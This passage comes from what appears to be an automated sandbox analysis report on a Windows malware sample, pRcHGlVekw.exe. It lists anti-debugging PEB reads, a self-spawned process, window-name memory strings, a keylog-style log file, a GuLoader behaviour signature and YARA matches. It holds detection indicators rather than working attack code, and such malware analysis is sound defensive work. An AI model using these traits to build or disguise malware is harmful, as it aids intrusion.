Code function: 1_2_02182EC2 mov eax, dword ptr fs:[00000030h] |
1_2_02182EC2 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02187540 mov eax, dword ptr fs:[00000030h] |
1_2_02187540 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02183944 mov eax, dword ptr fs:[00000030h] |
1_2_02183944 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_02187BB8 mov eax, dword ptr fs:[00000030h] |
1_2_02187BB8 |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Code function: 1_2_021855ED mov eax, dword ptr fs:[00000030h] |
1_2_021855ED |
Source: C:\Users\user\Desktop\pRcHGlVekw.exe |
Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe' |
Jump to behavior |
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp |
Binary or memory string: Program Manager |
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp |
Binary or memory string: Progman |
Source: logs.dat.16.dr |
Binary or memory string: [ Program Manager ] |
Source: pRcHGlVekw.exe, 00000010.00000002.1300934977.0000000000FB0000.00000002.00000001.sdmp |
Binary or memory string: Progmanlock |
Source: Initial file |
Signature Results: GuLoader behavior |
Source: Yara match |
File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY |